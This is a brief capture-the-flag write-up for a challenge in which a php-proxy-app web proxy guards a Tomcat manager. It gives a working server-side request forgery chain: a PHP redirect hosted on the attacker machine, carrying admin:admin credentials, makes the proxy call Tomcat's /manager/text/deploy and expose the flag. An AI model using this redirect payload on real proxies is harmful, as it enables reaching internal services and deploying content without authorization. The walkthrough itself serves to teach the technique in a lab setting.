CTF Challenge Description:
The challenge contains a php webproxy and a Tomcat server which has the Tomcat manager app deployed andwas only accessible via the php webproxy.
https://github.com/Athlon1600/php-proxy-app is what is running in the php-proxy
container and it has a few open issues, including some that look like they could be security-relevant.
Solution
To visit the tomcat container from the proxy, simply enter 127.0.0.1:8888
to view the tomcat webpage. Tomcat mentions an admin interface should be at /manager/html
but upon visiting 127.0.0.1:8888/manager/html
through the proxy we get a “401 unauthorized” error.
We also find the username and password (manager-web.xml
) and that /manager/text
exists as an interface for scripts.
We can use /manager/text/deploy
to deploy the folder that contains the flag and visit that like any other webpage.
Then we can host this on our local attacker machine. The server address can be:
http://127.0.0.1:8000/test
<?PHP
Header('location: http://admin:admin@127.0.0.1:8888/manager/text/deploy?path=/foofour&war=file:/c9fdb1da2a41a453ae291a1fb5d2519701bc60f6');
?>
- Redirect the proxy to http://127.0.0.1:8000/test
- Then redirect it to
http://127.0.0.1:8888/foofour/flag.txt
- Flag:
INS{SSRF-As-A-Service}
CTF Walkthrough Playlist